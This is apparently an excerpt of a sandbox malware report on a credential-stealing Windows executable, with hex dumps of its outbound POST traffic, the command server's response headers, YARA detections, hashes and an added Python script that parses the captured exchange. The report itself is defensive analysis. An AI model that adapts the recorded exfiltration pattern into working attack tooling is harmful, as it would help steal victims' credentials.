                                                                                                                                            2024-12-20 16:24:58 UTC15331OUTData Raw: 72 ac 72 01 35 0b 99 f2 41 46 54 aa cc 8a a1 0c 94 7c 20 a9 c7 b1 e5 e5 20 42 65 b7 7a a0 5d d7 ca ad 87 37 e9 d1 b0 96 7a f1 45 4d 0a 01 e3 57 7d e6 f6 59 71 33 e5 44 1f 73 53 22 81 6a 56 b2 ac 5e 0a 28 81 88 7d 88 77 3a b0 bd 1a fc 7b 1f 26 de ea 5c f2 7a 2a 5d 62 4a 31 4e 09 66 1f 5c f1 1b 89 1d 14 2e 4e 4f 2b 4b 4f ff 76 24 31 fe 26 1e 1d f9 f3 3d 55 70 5b 74 61 5c 96 e1 ba 47 2d 01 c3 09 11 9a 0e 14 1a bb 3f 50 5a 09 e6 cb f5 10 43 8f 62 23 2a fd 4d aa 31 26 1d 05 0e dd 3c 2f 78 28 ae d6 51 0d f1 79 24 86 a7 fa b6 9c b6 f3 99 67 e4 f8 a6 ca cd 2d 63 ee 05 8a f4 9f 55 76 57 4c 88 24 9a 50 8c e3 08 18 06 22 86 27 2d 39 65 28 bc f5 45 ff 01 a9 c4 c0 6b 79 86 68 8d 9d 3b 07 7a 8a f0 5e 1f 43 b0 6f 9d 2c 87 e2 f3 f1 01 f8 e4 28 a9 6d 51 14 8c f3 66 d3 c2
                                                                                                                                            Data Ascii: rr5AFT| Bez]7zEMW}Yq3DsS"jV^(}w:{&\z*]bJ1Nf\.NO+KOv$1&=Up[ta\G-?PZCb#*M1&</x(Qy$g-cUvWL$P"'-9e(Ekyh;z^Co,(mQf
                                                                                                                                            2024-12-20 16:24:58 UTC15331OUTData Raw: bb 5c 89 9d ee a2 a4 46 af 56 22 d7 bb 18 b4 80 20 3d 1d 6c 27 f1 7e 0a 22 8c 36 71 f9 0a 29 7f cc 23 dd 2a 51 2b e2 73 33 35 e3 2a d6 3a 83 d6 aa ae c7 aa f0 39 d2 6e 5e af 12 0c 35 a0 b0 1b b6 70 e0 5f 65 79 be 96 c7 b6 2e a9 83 32 da c0 d0 61 40 6a bf 9b 26 e5 a3 be 59 7e 9c fa 06 10 05 36 07 91 31 d7 3a 49 3f 6d 89 89 d1 af 29 a4 97 26 d5 8a c0 1a e3 24 05 1d 3f 9c f2 ea c0 7c 5a 09 e1 32 10 9e 47 81 97 46 65 82 32 fb c0 d3 97 ca ab 5c 86 e0 44 5d 0d 53 04 c6 e2 b9 c3 12 82 00 54 a1 eb 04 29 ff 5d b8 7d 10 96 75 63 5b 0c 71 4e 79 91 a8 d6 72 c3 24 eb 55 de 1b e9 72 a6 f1 8f 72 90 9e 97 86 4b a3 a7 4d e4 94 88 83 b9 62 62 ed d6 29 43 46 9a 30 b1 58 84 fc 2b 0c 12 4b 3a 44 09 c1 6c 9b 18 6e e2 86 e1 2b 90 a0 5e 4b 64 b0 28 e7 02 b5 bb f9 b3 57 3f 0a 89
                                                                                                                                            Data Ascii: \FV" =l'~"6q)#*Q+s35*:9n^5p_ey.2a@j&Y~61:I?m)&$?|Z2GFe2\D]ST)]}uc[qNyr$UrrKMbb)CF0X+K:Dln+^Kd(W?
                                                                                                                                            2024-12-20 16:25:01 UTC1137INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 20 Dec 2024 16:25:01 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=0tjsr29cqnruh69csbmbo2jq4f; expires=Tue, 15 Apr 2025 10:11:39 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FZRJU%2Fqm%2FrWtahCd8Refyx1zqEyMgL6eDsCadAHe28PU5xzl0V3uIduM5S5QJ9%2FC8SET9J83VCVJzK98KVLTkYS7rnQk9Mlc2WryadxNTR0OO0%2BG6kR9rFBCa05x4gYYUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f50fc59bc5017e9-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1698&min_rtt=1685&rtt_var=659&sent=304&recv=574&lost=0&retrans=0&sent_bytes=2833&recv_bytes=553448&delivery_rate=1626740&cwnd=232&unsent_bytes=0&cid=b8382314148c7e3d&ts=2364&x=0"
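Added triage example (not Joe Sandbox output and not code from the sample): the hex dump, its "Data Ascii" rendering and the response headers above are copied from the report; everything else is plain stdlib processing. It decodes the first captured POST chunk, shows that the "Data Ascii" line is only the printable-byte projection of that chunk (not readable text), measures the chunk's entropy, and pulls the fields an incident responder actually wants out of the Cloudflare response: `recv_bytes`/`sent_bytes` in the `cfL4` server-timing entry are the edge's byte counters for this TCP connection, so `recv_bytes=553448` is roughly what the sample uploaded before this `200 OK`, and the `PHPSESSID` cookie with a 9999999-second `Max-Age` is the C2 panel's session handling. Interpreting `recv_bytes` as the upload volume is an assumption about Cloudflare's counter semantics, stated here rather than on the page.

```python
# Added triage example; reads the captured exchange from the report above.
import math
import re
from collections import Counter
from urllib.parse import parse_qs

# First "Data Raw" chunk of the outbound POST body, copied from the report.
DATA_RAW = """
72 ac 72 01 35 0b 99 f2 41 46 54 aa cc 8a a1 0c
94 7c 20 a9 c7 b1 e5 e5 20 42 65 b7 7a a0 5d d7
ca ad 87 37 e9 d1 b0 96 7a f1 45 4d 0a 01 e3 57
7d e6 f6 59 71 33 e5 44 1f 73 53 22 81 6a 56 b2
ac 5e 0a 28 81 88 7d 88 77 3a b0 bd 1a fc 7b 1f
26 de ea 5c f2 7a 2a 5d 62 4a 31 4e 09 66 1f 5c
f1 1b 89 1d 14 2e 4e 4f 2b 4b 4f ff 76 24 31 fe
26 1e 1d f9 f3 3d 55 70 5b 74 61 5c 96 e1 ba 47
2d 01 c3 09 11 9a 0e 14 1a bb 3f 50 5a 09 e6 cb
f5 10 43 8f 62 23 2a fd 4d aa 31 26 1d 05 0e dd
3c 2f 78 28 ae d6 51 0d f1 79 24 86 a7 fa b6 9c
b6 f3 99 67 e4 f8 a6 ca cd 2d 63 ee 05 8a f4 9f
55 76 57 4c 88 24 9a 50 8c e3 08 18 06 22 86 27
2d 39 65 28 bc f5 45 ff 01 a9 c4 c0 6b 79 86 68
8d 9d 3b 07 7a 8a f0 5e 1f 43 b0 6f 9d 2c 87 e2
f3 f1 01 f8 e4 28 a9 6d 51 14 8c f3 66 d3 c2
"""

# Response headers as captured (status line omitted).
RESPONSE_HEADERS = """\
Date: Fri, 20 Dec 2024 16:25:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=0tjsr29cqnruh69csbmbo2jq4f; expires=Tue, 15 Apr 2025 10:11:39 GMT; Max-Age=9999999; path=/
Server: cloudflare
CF-RAY: 8f50fc59bc5017e9-EWR
server-timing: cfL4;desc="?proto=TCP&rtt=1698&min_rtt=1685&rtt_var=659&sent=304&recv=574&lost=0&retrans=0&sent_bytes=2833&recv_bytes=553448&delivery_rate=1626740&cwnd=232&unsent_bytes=0&cid=b8382314148c7e3d&ts=2364&x=0"
"""


def parse_data_raw(dump: str) -> bytes:
    """Joe Sandbox 'Data Raw' hex tokens -> bytes."""
    return bytes(int(tok, 16) for tok in dump.split())


def printable_projection(data: bytes) -> str:
    """Only 0x21..0x7e survive; this is what the 'Data Ascii' line shows
    (spaces dropped, since the HTML view collapses them)."""
    return "".join(chr(b) for b in data if 0x21 <= b <= 0x7E)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ~7-8 for encrypted or compressed data, far lower for text."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_headers(text: str) -> dict:
    """Lower-cased header name -> value; first ':' splits, so dates survive."""
    headers = {}
    for line in text.splitlines():
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def cloudflare_l4_metrics(server_timing: str) -> dict:
    """Fields of the cfL4 entry; the edge's TCP counters for this connection."""
    m = re.search(r'cfL4;desc="\?([^"]*)"', server_timing)
    return {k: v[0] for k, v in parse_qs(m.group(1)).items()} if m else {}


def parse_set_cookie(value: str) -> tuple:
    """(name, value, {attr: value}); ';' splits attributes, commas in expires stay."""
    first, *attrs = [p.strip() for p in value.split(";")]
    name, _, val = first.partition("=")
    attr_map = {}
    for attr in attrs:
        k, _, v = attr.partition("=")
        attr_map[k.strip().lower()] = v.strip()
    return name, val, attr_map


def triage() -> dict:
    """Summarise the captured exchange the way an IR note would record it."""
    payload = parse_data_raw(DATA_RAW)
    hdrs = parse_headers(RESPONSE_HEADERS)
    l4 = cloudflare_l4_metrics(hdrs.get("server-timing", ""))
    cookie_name, _, cookie_attrs = parse_set_cookie(hdrs.get("set-cookie", ""))
    cf_ray = hdrs.get("cf-ray", "")
    return {
        "chunk_len": len(payload),
        "chunk_entropy": round(shannon_entropy(payload), 2),
        # assumption: recv_bytes is what the edge received from the client
        "uploaded_to_server": int(l4.get("recv_bytes", 0)),
        "downloaded_from_server": int(l4.get("sent_bytes", 0)),
        "retransmits": int(l4.get("retrans", 0)),
        "session_cookie": cookie_name,
        "cookie_max_age": int(cookie_attrs.get("max-age", 0)),
        "cf_pop": cf_ray.rsplit("-", 1)[-1] if "-" in cf_ray else "",
        "fronted_by_cloudflare": hdrs.get("server", "").lower() == "cloudflare",
    }


if __name__ == "__main__":
    for key, val in triage().items():
        print(f"{key:>24}: {val}")
```

The entropy figure is computed over a single 255-byte chunk, so treat it as a coarse indicator only; the useful outputs for a case file are the ~553 KB upload volume against a 2.8 KB response, the PHP session cookie, and the CF-RAY suffix (`EWR`, the edge that terminated the connection, which says nothing about where the origin host is).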



                                                                                                                                            Target ID:0
                                                                                                                                            Start time:11:24:40
                                                                                                                                            Start date:20/12/2024
                                                                                                                                            Path:C:\Users\user\Desktop\0WO49yZcDA.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\0WO49yZcDA.exe"
                                                                                                                                            Imagebase:0xf70000
                                                                                                                                            File size:1'870'848 bytes
                                                                                                                                            MD5 hash:91E4F1AB8170B4AF79EC38F14533F6C4
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2412277604.0000000001996000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2412704361.0000000001996000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2503586892.0000000001996000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2437512461.0000000001996000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2462451964.0000000001996000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2462536117.0000000001996000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000003.2462602486.0000000006136000.00000004.00000800.00020000.00000000.sdmp, Offset: 06135000, based on PE: false
  • Associated: 00000000.00000003.2462352801.0000000006135000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_3_6135000_0WO49yZcDA.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ,
                                                                                                                                              • API String ID: 0-3772416878
                                                                                                                                              • Opcode ID: f8d20de7342adb6250e4578e505cae4ec6fb0150bb9ffe39e89fe8eede7c52c2
                                                                                                                                              • Instruction ID: bdbab238abe9489603863fac8f1ad22f3d40c67ffd42db211c656b3bdc236a9a
                                                                                                                                              • Opcode Fuzzy Hash: f8d20de7342adb6250e4578e505cae4ec6fb0150bb9ffe39e89fe8eede7c52c2
                                                                                                                                              • Instruction Fuzzy Hash: 0E5152A941D2D39ECB4A2E38E28E8037F78EB1E2043514BCAD8A0D907BC596D593C713
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000003.2462602486.0000000006136000.00000004.00000800.00020000.00000000.sdmp, Offset: 06135000, based on PE: false
  • Associated: 00000000.00000003.2462352801.0000000006135000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_3_6135000_0WO49yZcDA.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                              • Opcode ID: d408998279dc634ed1866d0c3e9d9570be2c0021b4a6a947306b1b8d491a6a84
                                                                                                                                              • Instruction ID: cf94571d183cf212c5a37c0115bf8c05bc32025b8cfffb378ce585ee1f1d9da4
                                                                                                                                              • Opcode Fuzzy Hash: d408998279dc634ed1866d0c3e9d9570be2c0021b4a6a947306b1b8d491a6a84
                                                                                                                                              • Instruction Fuzzy Hash: E7310CAEC0E5C26DDF5B2E38D21D9867F64EE2F1447190BDFC5A0DA42BC4419287C702
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000003.2462602486.0000000006136000.00000004.00000800.00020000.00000000.sdmp, Offset: 06135000, based on PE: false
  • Associated: 00000000.00000003.2462352801.0000000006135000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_3_6135000_0WO49yZcDA.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2dab7f6601efbbc28d094d4f3ad86853c5a56985c17e169f3cf77b8ec25991d6
                                                                                                                                              • Instruction ID: 8d4e5ae1f098da237328f0e293809884fd3a042e7fd067d2c07341373cc02d13
                                                                                                                                              • Opcode Fuzzy Hash: 2dab7f6601efbbc28d094d4f3ad86853c5a56985c17e169f3cf77b8ec25991d6
                                                                                                                                              • Instruction Fuzzy Hash: D342D1318093D19EDBA39F749165683BFB1BF4B714BAA19EDC4C24F423D3626542CB82
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000003.2462602486.0000000006136000.00000004.00000800.00020000.00000000.sdmp, Offset: 06135000, based on PE: false
  • Associated: 00000000.00000003.2462352801.0000000006135000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_3_6135000_0WO49yZcDA.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3f01f84498530bf929d282abbf65c94ee4ffb16183ca814506239d5784e898ed
                                                                                                                                              • Instruction ID: 4da7ce4511161a98c269a9789b994fc88c319ae694fa8d490688635c535d9b6e
                                                                                                                                              • Opcode Fuzzy Hash: 3f01f84498530bf929d282abbf65c94ee4ffb16183ca814506239d5784e898ed
                                                                                                                                              • Instruction Fuzzy Hash: CA710E728093D19EDBA79F748164683BFB1BF4B61476A48EDC0C25F133D7626882CB42